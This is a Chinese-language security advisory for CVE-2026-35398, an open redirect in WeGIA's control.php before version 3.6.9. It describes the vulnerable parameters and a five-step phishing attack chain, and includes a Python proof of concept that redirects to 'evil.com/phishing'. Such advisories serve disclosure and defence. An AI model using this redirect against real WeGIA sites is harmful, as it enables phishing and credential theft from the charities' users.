CVE-2026-35398 CVSS 6.1 中危

CVE-2026-35398 WeGIA开放重定向漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35398

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA

漏洞概述

WeGIA是用于管理慈善机构的Web应用程序。在3.6.9版本之前，该应用在/WeGIA/controle/control.php端点存在开放重定向漏洞。攻击者可通过精心构造的nextPage参数配合其他特定参数，将用户重定向至任意恶意网站。此漏洞可被用于网络钓鱼攻击，利用受信任的WeGIA域名欺骗用户，从而窃取敏感凭证。该问题已在3.6.9版本中修复。

技术细节

该漏洞位于WeGIA的/WeGIA/controle/control.php接口中。当应用程序处理请求时，若同时存在metodo=listarTodos、listarId_Nome和nomeClasse=OrigemControle参数，代码会直接获取nextPage参数的值并执行重定向操作，未进行任何域名白名单校验或合法性检查。由于CVSS向量显示无需用户认证（PR:N）且攻击复杂度低（AC:L），攻击者极易构造恶意链接。当受害者点击链接时，浏览器会信任WeGIA的域名，随后被重定向至攻击者控制的站点，导致凭证泄露或恶意软件下载。

攻击链分析

STEP 1

侦察

攻击者识别出目标机构使用的是WeGIA系统，且版本低于3.6.9。

STEP 2

制作载荷

攻击者构造包含恶意nextPage参数的URL，指向其控制的钓鱼网站，并拼接metodo、nomeClasse等必要参数。

STEP 3

传递载荷

攻击者将伪造的链接通过电子邮件或社交媒体发送给目标用户，利用WeGIA域名的可信度诱导用户点击。

STEP 4

利用漏洞

用户点击链接后，WeGIA服务器响应302重定向，将用户浏览器导航至攻击者设定的恶意网站。

STEP 5

达成目标

用户在恶意网站上被诱导输入敏感信息（如账号密码）或下载恶意软件，导致凭证失窃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
target_url = "http://target-weiga-site.com/WeGIA/controle/control.php"

# Malicious parameters demonstrating the Open Redirect
params = {
    "metodo": "listarTodos",
    "listarId_Nome": "",
    "nomeClasse": "OrigemControle",
    "nextPage": "http://evil.com/phishing"  # Attacker-controlled site
}

try:
    # Send GET request without following redirects to capture the Location header
    response = requests.get(target_url, params=params, allow_redirects=False, timeout=5)

    if response.status_code in [301, 302, 303, 307, 308]:
        redirect_location = response.headers.get('Location')
        if redirect_location and "evil.com" in redirect_location:
            print(f"[+] Vulnerability Confirmed!")
            print(f"[+] Server redirected to: {redirect_location}")
        else:
            print(f"[-] Redirect occurred but not to the expected payload: {redirect_location}")
    else:
        print(f"[-] No redirect triggered. Status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error during request: {e}")

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施

如果无法立即升级，建议在Web应用防火墙（WAF）或反向代理层部署规则，拦截包含外部域名（如http://或https://）的nextPage参数请求。同时，应加强对最终用户的安全意识教育，警惕来自看似可信域名的异常跳转。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表